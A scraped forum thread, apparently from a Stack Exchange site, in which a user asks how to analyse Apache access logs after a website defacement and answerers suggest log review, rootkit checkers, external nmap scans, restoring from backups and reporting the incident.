10

My company's website has been defaced, provided I have the apache raw access log, is there anything I could do to analyze when and what went wrong?

I mean what to look out for among all those thousands and thousands line of log?

Thanks for the help

nik
  • 7,040
  • 2
  • 24
  • 30
SteD
  • 225
  • 1
  • 7

3 Answers3

4

Daisetsu's answer is on the right lines.
But, you might be able to get some analysis done without hiring a full-time export too.
I am adding a couple of links to short articles that will give you the gist of what can be done.

  1. Web Security Interview Questions at WebAppSec
  2. Using your web server logs to find compromised web servers at DigitalOffencive
  3. What to do after a Web Site Defacement?

Suggestion: Moving this question to ServerFault might get more directed answers on what can be done.

nik
  • 7,040
  • 2
  • 24
  • 30
  • Thanks for the links and suggestions, how can I move this to ServerFault? seems like Serverfault it the most appropriate place to ask this – SteD May 27 '10 at 03:47
  • @SteD, You could have posted it there. But, now do not make a second posting `:-)` It is already being moved there, needs a total of 5 votes for that. I have added in mine -- others will help. – nik May 27 '10 at 05:12
4

When a system is compromised/defaced you're never sure if everything was cleaned and IMHO the best solution is always to reinstall it, but you need to do some forensics to understand what happened and preventing it from happening again.

Here's a list of important things to check:

  • take a look at every logfiles you can, especially the webserver and the system ones. In the webserver logfiles, check for posts
  • run rootkit checkers. They're not infalible but can lead you in the right direction. chkrootkit and especially rkhunter are the tools for the job
  • run nmap from outside of your server and check if there is something listening on any port that shouldn't be
  • if you've a rrdtool trending application (like Cacti, Munin or Ganglia) take a look the graphics and search for a possible time frame of the atack.
  • check the version of your webserver and see if there are known security issues about it.

Also, always keep this is mind:

  • shut down the services you don't need
  • test backups on a regular basis
  • follow the least privilege principle
  • have your services updated, especially regarding security updates
  • don't use default credentials

Hope this helps.

Marco Ramos
  • 3,100
  • 22
  • 25
  • 1
    +1, when compromised, save a copy of the "new" content, and restore everything from a backup. (Just one more reason to **keep good backups**). – Chris S May 27 '10 at 13:50
1

Yes, this is known as Network Forensics. It essentially is looking through network and server logs in order to find the origin of the attack and what was comprimized. To do this though you usually need a forensic specialist, and even when you do find out what happened, the worst you could do is sue the attacker or get them charged with a criminal act. A web defacement really isn't seen as a huge crime, that is unless there was money lost by the company as a result of the attack. If it's serious you should contact the appropriate authority and they will help with the collection of evidence. Here's a list of who to contact for cyber crime. http://www.justice.gov/criminal/cybercrime/reporting.htm Also this doesn't count as legal advice.

Daisetsu
  • 557
  • 1
  • 5
  • 8
  • 3
    Why would you need a forensic specialist to analyze Apache logs? A working knowledge of Linux and Apache should be qualification enough. – MDMarra May 27 '10 at 03:26
  • 1
    I was speaking from a legal point of view. If you want some informal review then put the logs in front of the it guy. –  May 27 '10 at 05:29
  • @Daisetu - The OP didn't say anything about legal repercussions for the attacker. He specifically asked what to look for to find out what went wrong. – MDMarra May 27 '10 at 18:44